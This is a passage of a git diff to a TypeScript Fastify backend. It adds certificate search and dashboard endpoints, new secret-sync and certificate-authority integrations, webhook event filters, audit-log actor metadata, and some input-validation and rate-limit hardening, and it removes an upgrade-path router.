ipAddress: z.string().trim() @@ -386,12 +407,20 @@ export const registerIdentityKubernetesRouter = async (server: FastifyZodProvide if ( data.tokenReviewMode && data.tokenReviewMode === IdentityKubernetesAuthTokenReviewMode.Gateway && 
- !data.gatewayId + !data.gatewayId && + !data.gatewayPoolId ) { ctx.addIssue({ path: ["gatewayId"], code: z.ZodIssueCode.custom, - message: "When token review mode is set to Gateway, a gateway must be selected" + message: "When token review mode is set to Gateway, a gateway or gateway pool must be selected" + }); + } + if (data.gatewayId && data.gatewayPoolId) { + ctx.addIssue({ + path: ["gatewayPoolId"], + code: z.ZodIssueCode.custom, + message: "Cannot specify both a gateway and a gateway pool" }); } if (data.accessTokenMaxTTL && data.accessTokenTTL ? data.accessTokenTTL > data.accessTokenMaxTTL : false) { diff --git a/backend/src/server/routes/v1/identity-ldap-auth-router.ts b/backend/src/server/routes/v1/identity-ldap-auth-router.ts index 8c67c0cf895..82d3ba4a6a6 100644 --- a/backend/src/server/routes/v1/identity-ldap-auth-router.ts +++ b/backend/src/server/routes/v1/identity-ldap-auth-router.ts @@ -195,6 +195,13 @@ export const registerIdentityLdapAuthRouter = async (server: FastifyZodProvider) await server.services.auditLog.createAuditLog({ ...req.auditLogInfo, + actor: { + type: ActorType.IDENTITY, + metadata: { + identityId: authIdentityId, + name: identity.name + } + }, orgId: identity.orgId, event: { type: EventType.LOGIN_IDENTITY_LDAP_AUTH, diff --git a/backend/src/server/routes/v1/identity-oci-auth-router.ts b/backend/src/server/routes/v1/identity-oci-auth-router.ts index 51af55c00bf..05a41994c3b 100644 --- a/backend/src/server/routes/v1/identity-oci-auth-router.ts +++ b/backend/src/server/routes/v1/identity-oci-auth-router.ts @@ -65,6 +65,13 @@ export const registerIdentityOciAuthRouter = async (server: FastifyZodProvider) await server.services.auditLog.createAuditLog({ ...req.auditLogInfo, + actor: { + type: ActorType.IDENTITY, + metadata: { + identityId: identityOciAuth.identityId, + name: identity.name + } + }, orgId: identity.orgId, event: { type: EventType.LOGIN_IDENTITY_OCI_AUTH, diff --git 
a/backend/src/server/routes/v1/identity-oidc-auth-router.ts b/backend/src/server/routes/v1/identity-oidc-auth-router.ts index 37c4b26704b..43e7c5f738f 100644 --- a/backend/src/server/routes/v1/identity-oidc-auth-router.ts +++ b/backend/src/server/routes/v1/identity-oidc-auth-router.ts @@ -72,6 +72,13 @@ export const registerIdentityOidcAuthRouter = async (server: FastifyZodProvider) await server.services.auditLog.createAuditLog({ ...req.auditLogInfo, + actor: { + type: ActorType.IDENTITY, + metadata: { + identityId: identityOidcAuth.identityId, + name: identity.name + } + }, orgId: identity.orgId, event: { type: EventType.LOGIN_IDENTITY_OIDC_AUTH, diff --git a/backend/src/server/routes/v1/identity-spiffe-auth-router.ts b/backend/src/server/routes/v1/identity-spiffe-auth-router.ts index 132005a1f91..c540bf51d2e 100644 --- a/backend/src/server/routes/v1/identity-spiffe-auth-router.ts +++ b/backend/src/server/routes/v1/identity-spiffe-auth-router.ts @@ -136,6 +136,13 @@ export const registerIdentitySpiffeAuthRouter = async (server: FastifyZodProvide await server.services.auditLog.createAuditLog({ ...req.auditLogInfo, + actor: { + type: ActorType.IDENTITY, + metadata: { + identityId: identitySpiffeAuth.identityId, + name: identity.name + } + }, orgId: identity.orgId, event: { type: EventType.LOGIN_IDENTITY_SPIFFE_AUTH, diff --git a/backend/src/server/routes/v1/identity-tls-cert-auth-router.ts b/backend/src/server/routes/v1/identity-tls-cert-auth-router.ts index b7eafb6bcc6..572951b4e60 100644 --- a/backend/src/server/routes/v1/identity-tls-cert-auth-router.ts +++ b/backend/src/server/routes/v1/identity-tls-cert-auth-router.ts @@ -79,6 +79,13 @@ export const registerIdentityTlsCertAuthRouter = async (server: FastifyZodProvid await server.services.auditLog.createAuditLog({ ...req.auditLogInfo, + actor: { + type: ActorType.IDENTITY, + metadata: { + identityId: identityTlsCertAuth.identityId, + name: identity.name + } + }, orgId: identity.orgId, event: { type: 
EventType.LOGIN_IDENTITY_TLS_CERT_AUTH, diff --git a/backend/src/server/routes/v1/identity-universal-auth-router.ts b/backend/src/server/routes/v1/identity-universal-auth-router.ts index fe0d62e12fd..cbbb70af6c8 100644 --- a/backend/src/server/routes/v1/identity-universal-auth-router.ts +++ b/backend/src/server/routes/v1/identity-universal-auth-router.ts @@ -72,6 +72,13 @@ export const registerIdentityUaRouter = async (server: FastifyZodProvider) => { await server.services.auditLog.createAuditLog({ ...req.auditLogInfo, + actor: { + type: ActorType.IDENTITY, + metadata: { + identityId: identityUa.identityId, + name: identity.name + } + }, orgId: identity.orgId, event: { type: EventType.LOGIN_IDENTITY_UNIVERSAL_AUTH, diff --git a/backend/src/server/routes/v1/index.ts b/backend/src/server/routes/v1/index.ts index c00256cc400..1eafb60492c 100644 --- a/backend/src/server/routes/v1/index.ts +++ b/backend/src/server/routes/v1/index.ts @@ -15,6 +15,7 @@ import { registerCaRouter } from "./certificate-authority-router"; import { CERTIFICATE_AUTHORITY_REGISTER_ROUTER_MAP } from "./certificate-authority-routers"; import { registerGeneralCertificateAuthorityRouter } from "./certificate-authority-routers/general-certificate-authority-router"; import { registerCertificateCleanupRouter } from "./certificate-cleanup-router"; +import { registerCertificateInventoryViewRouter } from "./certificate-inventory-view-router"; import { registerCertificatePolicyRouter } from "./certificate-policy-router"; import { registerCertificateProfilesRouter } from "./certificate-profiles-router"; import { registerCertificateRouter } from "./certificate-router"; @@ -78,7 +79,6 @@ import { registerSecretValidationRuleRouter } from "./secret-validation-rule-rou import { registerSignerRouter } from "./signer-router"; import { registerSlackRouter } from "./slack-router"; import { registerSsoRouter } from "./sso-router"; -import { registerUpgradePathRouter } from "./upgrade-path-router"; import { 
registerUserActionRouter } from "./user-action-router"; import { registerUserEngagementRouter } from "./user-engagement-router"; import { registerUserRouter } from "./user-router"; @@ -152,6 +152,7 @@ export const registerV1Routes = async (server: FastifyZodProvider) => { await server.register( async (projectRouter) => { await projectRouter.register(registerProjectRouter); + await projectRouter.register(registerCertificateInventoryViewRouter); await projectRouter.register(registerProjectMembershipRouter); await projectRouter.register(registerProjectIdentityRouter); await projectRouter.register(registerProjectEnvRouter); @@ -314,8 +315,6 @@ export const registerV1Routes = async (server: FastifyZodProvider) => { ); await server.register(registerEventRouter, { prefix: "/events" }); - await server.register(registerUpgradePathRouter, { prefix: "/upgrade-path" }); - await server.register( async (approvalPolicyRouter) => { // Register policy type-specific endpoints diff --git a/backend/src/server/routes/v1/integration-router.ts b/backend/src/server/routes/v1/integration-router.ts index 8654c215a5e..f7954b7a19c 100644 --- a/backend/src/server/routes/v1/integration-router.ts +++ b/backend/src/server/routes/v1/integration-router.ts @@ -53,7 +53,7 @@ export const registerIntegrationRouter = async (server: FastifyZodProvider) => { targetService: z.string().trim().optional().describe(INTEGRATION.CREATE.targetService), targetServiceId: z.string().trim().optional().describe(INTEGRATION.CREATE.targetServiceId), owner: z.string().trim().optional().describe(INTEGRATION.CREATE.owner), - url: z.string().trim().optional().describe(INTEGRATION.CREATE.url), + url: z.string().trim().url().optional().describe(INTEGRATION.CREATE.url), path: z.string().trim().optional().describe(INTEGRATION.CREATE.path), region: z.string().trim().optional().describe(INTEGRATION.CREATE.region), scope: z.string().trim().optional().describe(INTEGRATION.CREATE.scope), diff --git 
a/backend/src/server/routes/v1/invite-org-router.ts b/backend/src/server/routes/v1/invite-org-router.ts index 55cd5f892da..416775fab28 100644 --- a/backend/src/server/routes/v1/invite-org-router.ts +++ b/backend/src/server/routes/v1/invite-org-router.ts @@ -22,6 +22,7 @@ export const registerInviteOrgRouter = async (server: FastifyZodProvider) => { .trim() .email() .array() + .max(100) .refine((val) => val.every((el) => el === el.toLowerCase()), "Email must be lowercase"), organizationId: z.string().trim(), organizationRoleSlug: z.string().default(OrgMembershipRole.Member) diff --git a/backend/src/server/routes/v1/microsoft-teams-router.ts b/backend/src/server/routes/v1/microsoft-teams-router.ts index d0905c23bc8..9928ae82ce8 100644 --- a/backend/src/server/routes/v1/microsoft-teams-router.ts +++ b/backend/src/server/routes/v1/microsoft-teams-router.ts @@ -376,6 +376,9 @@ export const registerMicrosoftTeamsRouter = async (server: FastifyZodProvider) = server.route({ method: "POST", url: "/message-endpoint", + config: { + rateLimit: writeLimit + }, schema: { operationId: "handleMicrosoftTeamsMessageEndpoint", body: z.any(), diff --git a/backend/src/server/routes/v1/organization-memberships-router.ts b/backend/src/server/routes/v1/organization-memberships-router.ts index 34e45196308..e64831ec0d7 100644 --- a/backend/src/server/routes/v1/organization-memberships-router.ts +++ b/backend/src/server/routes/v1/organization-memberships-router.ts @@ -3,9 +3,11 @@ import { z } from "zod"; import { AccessScope, GroupsSchema, TemporaryPermissionMode } from "@app/db/schemas"; import { ApiDocsTags } from "@app/lib/api-docs"; import { ms } from "@app/lib/ms"; +import { OrderByDirection } from "@app/lib/types"; import { readLimit, writeLimit } from "@app/server/config/rateLimiter"; import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; import { AuthMode } from "@app/services/auth/auth-type"; +import { OrgGroupsOrderBy } from 
"@app/services/membership-group/membership-group-types"; /** * Organization group memberships. @@ -54,7 +56,14 @@ export const registerOrganizationMembershipsRouter = async (server: FastifyZodPr security: [{ bearerAuth: [] }], querystring: z.object({ limit: z.coerce.number().min(1).max(100).default(100).optional(), - offset: z.coerce.number().min(0).default(0).optional() + offset: z.coerce.number().min(0).default(0).optional(), + search: z.string().optional(), + roles: z + .union([z.string(), z.array(z.string())]) + .transform((v) => (typeof v === "string" ? [v] : v)) + .optional(), + orderBy: z.nativeEnum(OrgGroupsOrderBy).optional(), + orderDirection: z.nativeEnum(OrderByDirection).optional() }), response: { 200: z.object({ @@ -72,7 +81,11 @@ export const registerOrganizationMembershipsRouter = async (server: FastifyZodPr }, data: { limit: req.query.limit, - offset: req.query.offset + offset: req.query.offset, + search: req.query.search, + roles: req.query.roles, + orderBy: req.query.orderBy, + orderDirection: req.query.orderDirection } }); diff --git a/backend/src/server/routes/v1/project-router.ts b/backend/src/server/routes/v1/project-router.ts index 9bb2fb12979..26f505579d9 100644 --- a/backend/src/server/routes/v1/project-router.ts +++ b/backend/src/server/routes/v1/project-router.ts @@ -1306,18 +1306,46 @@ export const registerProjectRouter = async (server: FastifyZodProvider) => { ) .optional() .describe(PROJECTS.SEARCH_CERTIFICATES.metadata), - extendedKeyUsage: z.string().trim().optional().describe(PROJECTS.SEARCH_CERTIFICATES.extendedKeyUsage) + extendedKeyUsage: z.string().trim().optional().describe(PROJECTS.SEARCH_CERTIFICATES.extendedKeyUsage), + keyAlgorithm: z + .union([z.string().trim(), z.array(z.string().trim())]) + .optional() + .describe(PROJECTS.SEARCH_CERTIFICATES.keyAlgorithm), + signatureAlgorithm: z.string().trim().optional().describe(PROJECTS.SEARCH_CERTIFICATES.signatureAlgorithm), + keySizes: 
z.array(z.number()).optional().describe(PROJECTS.SEARCH_CERTIFICATES.keySizes), + caIds: z.array(z.string().uuid()).optional().describe(PROJECTS.SEARCH_CERTIFICATES.caIds), + enrollmentTypes: z.array(z.string().trim()).optional().describe(PROJECTS.SEARCH_CERTIFICATES.enrollmentTypes), + source: z + .union([z.string().trim(), z.array(z.string().trim())]) + .optional() + .describe(PROJECTS.SEARCH_CERTIFICATES.source), + notAfterFrom: z.coerce.date().optional().describe(PROJECTS.SEARCH_CERTIFICATES.notAfterFrom), + notAfterTo: z.coerce.date().optional().describe(PROJECTS.SEARCH_CERTIFICATES.notAfterTo), + notBeforeFrom: z.coerce.date().optional().describe(PROJECTS.SEARCH_CERTIFICATES.notBeforeFrom), + notBeforeTo: z.coerce.date().optional().describe(PROJECTS.SEARCH_CERTIFICATES.notBeforeTo), + sortBy: z + .enum(["notAfter", "notBefore", "createdAt", "commonName", "keyAlgorithm", "status"]) + .optional() + .describe(PROJECTS.SEARCH_CERTIFICATES.sortBy), + sortOrder: z.enum(["asc", "desc"]).optional().describe(PROJECTS.SEARCH_CERTIFICATES.sortOrder) }), response: { 200: z.object({ - certificates: z.array(CertificatesSchema.extend({ hasPrivateKey: z.boolean() })), + certificates: z.array( + CertificatesSchema.extend({ + hasPrivateKey: z.boolean(), + caName: z.string().nullable().optional(), + profileName: z.string().nullable().optional(), + enrollmentType: z.string().nullable().optional() + }) + ), totalCount: z.number() }) } }, onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), handler: async (req) => { - const { metadata, ...filters } = req.body; + const { metadata, sortBy, sortOrder, ...filters } = req.body; const { certificates, totalCount } = await server.services.project.listProjectCertificates({ filter: { projectId: req.params.projectId, @@ -1328,12 +1356,157 @@ export const registerProjectRouter = async (server: FastifyZodProvider) => { actorAuthMethod: req.permission.authMethod, actor: req.permission.type, ...filters, - metadataFilter: 
metadata + metadataFilter: metadata, + sortBy, + sortOrder }); return { certificates, totalCount }; } }); + server.route({ + method: "GET", + url: "/:projectId/certificates/dashboard-stats", + config: { + rateLimit: readLimit + }, + schema: { + hide: true, + operationId: "getCertificateDashboardStats", + tags: [ApiDocsTags.PkiCertificates], + description: "Get aggregated dashboard statistics for certificates in a project.", + params: z.object({ + projectId: z.string().trim() + }), + response: { + 200: z.object({ + totals: z.object({ + total: z.number(), + active: z.number(), + expiringSoon: z.number(), + expired: z.number(), + revoked: z.number() + }), + expiringSoonNoAutoRenewal: z.number(), + expiredNotRenewed: z.number(), + distributions: z.object({ + byEnrollmentMethod: z.array(z.object({ label: z.string(), count: z.number() })), + byAlgorithm: z.array(z.object({ label: z.string(), count: z.number() })), + byCA: z.array(z.object({ id: z.string(), label: z.string(), count: z.number() })), + byStatus: z.array(z.object({ label: z.string(), count: z.number() })) + }), + expirationBuckets: z.array(z.object({ bucket: z.string(), count: z.number() })), + validityBuckets: z.array(z.object({ bucket: z.string(), count: z.number() })) + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + return server.services.project.getDashboardStats({ + filter: { + projectId: req.params.projectId, + type: ProjectFilterType.ID + }, + actorId: req.permission.id, + actorOrgId: req.permission.orgId, + actorAuthMethod: req.permission.authMethod, + actor: req.permission.type + }); + } + }); + + server.route({ + method: "GET", + url: "/:projectId/certificates/activity-trend", + config: { + rateLimit: readLimit + }, + schema: { + hide: true, + operationId: "getCertificateActivityTrend", + tags: [ApiDocsTags.PkiCertificates], + description: "Get certificate lifecycle activity trend over time.", + params: z.object({ + projectId: 
z.string().trim() + }), + querystring: z.object({ + range: z.enum(["7d", "30d", "6m"]).optional().default("30d") + }), + response: { + 200: z.object({ + periods: z.array( + z.object({ + period: z.string(), + issued: z.number(), + expired: z.number(), + revoked: z.number(), + renewed: z.number() + }) + ) + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + return server.services.project.getActivityTrend({ + filter: { + projectId: req.params.projectId, + type: ProjectFilterType.ID + }, + range: req.query.range, + actorId: req.permission.id, + actorOrgId: req.permission.orgId, + actorAuthMethod: req.permission.authMethod, + actor: req.permission.type + }); + } + }); + + server.route({ + method: "GET", + url: "/:projectId/certificates/pqc-trend", + config: { + rateLimit: readLimit + }, + schema: { + hide: true, + operationId: "getCertificatePqcTrend", + tags: [ApiDocsTags.PkiCertificates], + description: "Get certificate PQC adoption trend over time.", + params: z.object({ + projectId: z.string().trim() + }), + querystring: z.object({ + range: z.enum(["7d", "30d", "6m"]).optional().default("30d") + }), + response: { + 200: z.object({ + periods: z.array( + z.object({ + period: z.string(), + pqc: z.number(), + nonPqc: z.number() + }) + ) + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + return server.services.project.getPqcTrend({ + filter: { + projectId: req.params.projectId, + type: ProjectFilterType.ID + }, + range: req.query.range, + actorId: req.permission.id, + actorOrgId: req.permission.orgId, + actorAuthMethod: req.permission.authMethod, + actor: req.permission.type + }); + } + }); + server.route({ method: "GET", url: "/:projectId/pki-alerts", diff --git a/backend/src/server/routes/v1/secret-sync-routers/index.ts b/backend/src/server/routes/v1/secret-sync-routers/index.ts index abe6d17f251..b2b04436a4d 100644 --- 
a/backend/src/server/routes/v1/secret-sync-routers/index.ts +++ b/backend/src/server/routes/v1/secret-sync-routers/index.ts @@ -29,11 +29,13 @@ import { registerLaravelForgeSyncRouter } from "./laravel-forge-sync-router"; import { registerNetlifySyncRouter } from "./netlify-sync-router"; import { registerNorthflankSyncRouter } from "./northflank-sync-router"; import { registerOctopusDeploySyncRouter } from "./octopus-deploy-sync-router"; +import { registerOnaSyncRouter } from "./ona-sync-router"; import { registerRailwaySyncRouter } from "./railway-sync-router"; import { registerRenderSyncRouter } from "./render-sync-router"; import { registerSupabaseSyncRouter } from "./supabase-sync-router"; import { registerTeamCitySyncRouter } from "./teamcity-sync-router"; import { registerTerraformCloudSyncRouter } from "./terraform-cloud-sync-router"; +import { registerTravisCISyncRouter } from "./travis-ci-sync-router"; import { registerVercelSyncRouter } from "./vercel-sync-router"; import { registerWindmillSyncRouter } from "./windmill-sync-router"; import { registerZabbixSyncRouter } from "./zabbix-sync-router"; @@ -77,5 +79,7 @@ export const SECRET_SYNC_REGISTER_ROUTER_MAP: Record + registerSyncSecretsEndpoints({ + destination: SecretSync.Ona, + server, + responseSchema: OnaSyncSchema, + createSchema: CreateOnaSyncSchema, + updateSchema: UpdateOnaSyncSchema + }); diff --git a/backend/src/server/routes/v1/secret-sync-routers/secret-sync-endpoints.ts b/backend/src/server/routes/v1/secret-sync-routers/secret-sync-endpoints.ts index 9ef59182adb..801bb7068ab 100644 --- a/backend/src/server/routes/v1/secret-sync-routers/secret-sync-endpoints.ts +++ b/backend/src/server/routes/v1/secret-sync-routers/secret-sync-endpoints.ts @@ -48,7 +48,8 @@ export const registerSyncSecretsEndpoints = = { [SecretSync.OnePass]: "OnePassword", [SecretSync.GitHub]: "GitHub", - [SecretSync.GitLab]: "GitLab" + [SecretSync.GitLab]: "GitLab", + [SecretSync.TravisCI]: "TravisCI" }; const 
destinationNameForOpId = specialCases[destination] ?? diff --git a/backend/src/server/routes/v1/secret-sync-routers/secret-sync-router.ts b/backend/src/server/routes/v1/secret-sync-routers/secret-sync-router.ts index 5b10c51756f..5981d633a7e 100644 --- a/backend/src/server/routes/v1/secret-sync-routers/secret-sync-router.ts +++ b/backend/src/server/routes/v1/secret-sync-routers/secret-sync-router.ts @@ -58,11 +58,13 @@ import { LaravelForgeSyncListItemSchema, LaravelForgeSyncSchema } from "@app/ser import { NetlifySyncListItemSchema, NetlifySyncSchema } from "@app/services/secret-sync/netlify"; import { NorthflankSyncListItemSchema, NorthflankSyncSchema } from "@app/services/secret-sync/northflank"; import { OctopusDeploySyncListItemSchema, OctopusDeploySyncSchema } from "@app/services/secret-sync/octopus-deploy"; +import { OnaSyncListItemSchema, OnaSyncSchema } from "@app/services/secret-sync/ona"; import { RailwaySyncListItemSchema, RailwaySyncSchema } from "@app/services/secret-sync/railway/railway-sync-schemas"; import { RenderSyncListItemSchema, RenderSyncSchema } from "@app/services/secret-sync/render/render-sync-schemas"; import { SupabaseSyncListItemSchema, SupabaseSyncSchema } from "@app/services/secret-sync/supabase"; import { TeamCitySyncListItemSchema, TeamCitySyncSchema } from "@app/services/secret-sync/teamcity"; import { TerraformCloudSyncListItemSchema, TerraformCloudSyncSchema } from "@app/services/secret-sync/terraform-cloud"; +import { TravisCISyncListItemSchema, TravisCISyncSchema } from "@app/services/secret-sync/travis-ci"; import { VercelSyncListItemSchema, VercelSyncSchema } from "@app/services/secret-sync/vercel"; import { WindmillSyncListItemSchema, WindmillSyncSchema } from "@app/services/secret-sync/windmill"; import { ZabbixSyncListItemSchema, ZabbixSyncSchema } from "@app/services/secret-sync/zabbix"; @@ -104,7 +106,9 @@ const SecretSyncSchema = z.discriminatedUnion("destination", [ OctopusDeploySyncSchema, CircleCISyncSchema, 
AzureEntraIdScimSyncSchema, - ExternalInfisicalSyncSchema + ExternalInfisicalSyncSchema, + OnaSyncSchema, + TravisCISyncSchema ]); const SecretSyncOptionsSchema = z.discriminatedUnion("destination", [ @@ -144,7 +148,9 @@ const SecretSyncOptionsSchema = z.discriminatedUnion("destination", [ OctopusDeploySyncListItemSchema, CircleCISyncListItemSchema, AzureEntraIdScimSyncListItemSchema, - ExternalInfisicalSyncListItemSchema + ExternalInfisicalSyncListItemSchema, + OnaSyncListItemSchema, + TravisCISyncListItemSchema ]); export const registerSecretSyncRouter = async (server: FastifyZodProvider) => { diff --git a/backend/src/server/routes/v1/secret-sync-routers/travis-ci-sync-router.ts b/backend/src/server/routes/v1/secret-sync-routers/travis-ci-sync-router.ts new file mode 100644 index 00000000000..cf4cc88158d --- /dev/null +++ b/backend/src/server/routes/v1/secret-sync-routers/travis-ci-sync-router.ts @@ -0,0 +1,17 @@ +import { SecretSync } from "@app/services/secret-sync/secret-sync-enums"; +import { + CreateTravisCISyncSchema, + TravisCISyncSchema, + UpdateTravisCISyncSchema +} from "@app/services/secret-sync/travis-ci"; + +import { registerSyncSecretsEndpoints } from "./secret-sync-endpoints"; + +export const registerTravisCISyncRouter = async (server: FastifyZodProvider) => + registerSyncSecretsEndpoints({ + destination: SecretSync.TravisCI, + server, + responseSchema: TravisCISyncSchema, + createSchema: CreateTravisCISyncSchema, + updateSchema: UpdateTravisCISyncSchema + }); diff --git a/backend/src/server/routes/v1/upgrade-path-router.ts b/backend/src/server/routes/v1/upgrade-path-router.ts deleted file mode 100644 index 752118c7353..00000000000 --- a/backend/src/server/routes/v1/upgrade-path-router.ts +++ /dev/null @@ -1,119 +0,0 @@ -import { z } from "zod"; - -import { BadRequestError } from "@app/lib/errors"; -import { logger } from "@app/lib/logger"; -import { publicEndpointLimit } from "@app/server/config/rateLimiter"; -import { versionSchema } from 
"@app/services/upgrade-path/upgrade-path-schemas"; - -export const registerUpgradePathRouter = async (server: FastifyZodProvider) => { - server.route({ - method: "GET", - url: "/versions", - config: { - rateLimit: publicEndpointLimit - }, - schema: { - operationId: "listUpgradeVersions", - response: { - 200: z.object({ - versions: z.array( - z.object({ - tagName: z.string(), - name: z.string(), - publishedAt: z.string(), - prerelease: z.boolean(), - draft: z.boolean() - }) - ) - }) - } - }, - handler: async (req) => { - try { - const versions = await req.server.services.upgradePath.getGitHubReleases(); - - return { - versions - }; - } catch (error) { - logger.error(error, "Failed to fetch versions"); - if (error instanceof z.ZodError) { - throw new BadRequestError({ message: "Invalid query parameters" }); - } - throw new BadRequestError({ message: "Failed to fetch GitHub releases" }); - } - } - }); - - server.route({ - method: "POST", - url: "/calculate", - config: { - rateLimit: publicEndpointLimit - }, - schema: { - operationId: "calculateUpgradePath", - body: z.object({ - fromVersion: versionSchema, - toVersion: versionSchema - }), - response: { - 200: z.object({ - path: z.array( - z.object({ - version: z.string(), - name: z.string(), - publishedAt: z.string(), - prerelease: z.boolean() - }) - ), - breakingChanges: z.array( - z.object({ - version: z.string(), - changes: z.array( - z.object({ - title: z.string(), - description: z.string(), - action: z.string() - }) - ) - }) - ), - features: z.array( - z.object({ - version: z.string(), - name: z.string(), - body: z.string(), - publishedAt: z.string() - }) - ), - hasDbMigration: z.boolean(), - config: z.record(z.unknown()) - }) - } - }, - handler: async (req) => { - try { - const { fromVersion, toVersion } = req.body; - - const result = await req.server.services.upgradePath.calculateUpgradePath(fromVersion, toVersion); - - logger.info( - { pathLength: result.path.length, hasBreaking: result.breakingChanges.length > 
0 }, - "Upgrade path calculated" - ); - - return result; - } catch (error) { - logger.error(error, "Failed to calculate upgrade path"); - if (error instanceof z.ZodError) { - throw new BadRequestError({ message: `Invalid input: ${error.errors.map((e) => e.message).join(", ")}` }); - } - if (error instanceof Error) { - throw new BadRequestError({ message: error.message }); - } - throw new BadRequestError({ message: "Failed to calculate upgrade path" }); - } - } - }); -}; diff --git a/backend/src/server/routes/v1/webhook-router.ts b/backend/src/server/routes/v1/webhook-router.ts index f3b8804f1af..a4e80196a04 100644 --- a/backend/src/server/routes/v1/webhook-router.ts +++ b/backend/src/server/routes/v1/webhook-router.ts @@ -8,7 +8,11 @@ import { getTelemetryDistinctId } from "@app/server/lib/telemetry"; import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; import { AuthMode } from "@app/services/auth/auth-type"; import { PostHogEventTypes } from "@app/services/telemetry/telemetry-types"; -import { WebhookType } from "@app/services/webhook/webhook-types"; +import { + SUBSCRIBABLE_WEBHOOK_EVENTS, + TSubscribableWebhookEvent, + WebhookType +} from "@app/services/webhook/webhook-types"; export const sanitizedWebhookSchema = WebhooksSchema.pick({ id: true, @@ -26,7 +30,12 @@ export const sanitizedWebhookSchema = WebhooksSchema.pick({ id: z.string(), name: z.string(), slug: z.string() - }) + }), + eventsFilter: z.array( + z.object({ + eventName: z.enum([...SUBSCRIBABLE_WEBHOOK_EVENTS] as [TSubscribableWebhookEvent, ...TSubscribableWebhookEvent[]]) + }) + ) }); export const registerWebhookRouter = async (server: FastifyZodProvider) => { @@ -46,15 +55,28 @@ export const registerWebhookRouter = async (server: FastifyZodProvider) => { environment: z.string().trim(), webhookUrl: z.string().url().trim(), webhookSecretKey: z.string().trim().optional(), - secretPath: z.string().trim().default("/").transform(removeTrailingSlash) + secretPath: 
z.string().trim().default("/").transform(removeTrailingSlash), + eventsFilter: z + .array( + z.object({ + eventName: z.enum([...SUBSCRIBABLE_WEBHOOK_EVENTS] as [ + TSubscribableWebhookEvent, + ...TSubscribableWebhookEvent[] + ]) + }) + ) + .optional() }) .superRefine((data, ctx) => { - if (data.type === WebhookType.SLACK && !data.webhookUrl.includes("hooks.slack.com")) { - ctx.addIssue({ - code: z.ZodIssueCode.custom, - message: "Incoming Webhook URL is invalid.", - path: ["webhookUrl"] - }); + if (data.type === WebhookType.SLACK) { + const parsed = new URL(data.webhookUrl); + if (parsed.hostname !== "hooks.slack.com") { + ctx.addIssue({ + code: z.ZodIssueCode.custom, + message: "Incoming Webhook URL is invalid.", + path: ["webhookUrl"] + }); + } } }), response: { @@ -82,7 +104,8 @@ export const registerWebhookRouter = async (server: FastifyZodProvider) => { environment: webhook.environment.slug, webhookId: webhook.id, isDisabled: webhook.isDisabled, - secretPath: webhook.secretPath + secretPath: webhook.secretPath, + eventsFilter: webhook.eventsFilter } } }); @@ -115,9 +138,23 @@ export const registerWebhookRouter = async (server: FastifyZodProvider) => { params: z.object({ webhookId: z.string().trim() }), - body: z.object({ - isDisabled: z.boolean().default(false) - }), + body: z + .object({ + isDisabled: z.boolean().optional(), + eventsFilter: z + .array( + z.object({ + eventName: z.enum([...SUBSCRIBABLE_WEBHOOK_EVENTS] as [ + TSubscribableWebhookEvent, + ...TSubscribableWebhookEvent[] + ]) + }) + ) + .optional() + }) + .refine(({ isDisabled, eventsFilter }) => { + return isDisabled !== undefined || eventsFilter !== undefined; + }, "At least one field is required"), response: { 200: z.object({ message: z.string(), @@ -132,7 +169,8 @@ export const registerWebhookRouter = async (server: FastifyZodProvider) => { actorAuthMethod: req.permission.authMethod, actorOrgId: req.permission.orgId, id: req.params.webhookId, - isDisabled: req.body.isDisabled + isDisabled: 
req.body.isDisabled, + eventsFilter: req.body.eventsFilter }); await server.services.auditLog.createAuditLog({ @@ -144,7 +182,8 @@ export const registerWebhookRouter = async (server: FastifyZodProvider) => { environment: webhook.environment.slug, webhookId: webhook.id, isDisabled: webhook.isDisabled, - secretPath: webhook.secretPath + secretPath: webhook.secretPath, + eventsFilter: webhook.eventsFilter } } }); diff --git a/backend/src/server/routes/v2/certificate-authority-router.ts b/backend/src/server/routes/v2/certificate-authority-router.ts index e5c9d5fd643..51fe7a20955 100644 --- a/backend/src/server/routes/v2/certificate-authority-router.ts +++ b/backend/src/server/routes/v2/certificate-authority-router.ts @@ -6,16 +6,22 @@ import { readLimit } from "@app/server/config/rateLimiter"; import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; import { AuthMode } from "@app/services/auth/auth-type"; import { AcmeCertificateAuthoritySchema } from "@app/services/certificate-authority/acme/acme-certificate-authority-schemas"; +import { AwsAcmPublicCaCertificateAuthoritySchema } from "@app/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-schemas"; import { AwsPcaCertificateAuthoritySchema } from "@app/services/certificate-authority/aws-pca/aws-pca-certificate-authority-schemas"; import { AzureAdCsCertificateAuthoritySchema } from "@app/services/certificate-authority/azure-ad-cs/azure-ad-cs-certificate-authority-schemas"; import { CaType } from "@app/services/certificate-authority/certificate-authority-enums"; +import { DigiCertCertificateAuthoritySchema } from "@app/services/certificate-authority/digicert/digicert-certificate-authority-schemas"; import { InternalCertificateAuthoritySchema } from "@app/services/certificate-authority/internal/internal-certificate-authority-schemas"; +import { VenafiTppCertificateAuthoritySchema } from 
"@app/services/certificate-authority/venafi-tpp/venafi-tpp-certificate-authority-schemas"; const CertificateAuthoritySchema = z.discriminatedUnion("type", [ InternalCertificateAuthoritySchema, AcmeCertificateAuthoritySchema, AzureAdCsCertificateAuthoritySchema, - AwsPcaCertificateAuthoritySchema + AwsPcaCertificateAuthoritySchema, + DigiCertCertificateAuthoritySchema, + AwsAcmPublicCaCertificateAuthoritySchema, + VenafiTppCertificateAuthoritySchema ]); export const registerCaRouter = async (server: FastifyZodProvider) => { @@ -73,6 +79,30 @@ export const registerCaRouter = async (server: FastifyZodProvider) => { req.permission ); + const digicertCas = await server.services.certificateAuthority.listCertificateAuthoritiesByProjectId( + { + projectId: req.query.projectId, + type: CaType.DIGICERT + }, + req.permission + ); + + const awsAcmPublicCas = await server.services.certificateAuthority.listCertificateAuthoritiesByProjectId( + { + projectId: req.query.projectId, + type: CaType.AWS_ACM_PUBLIC_CA + }, + req.permission + ); + + const venafiTppCas = await 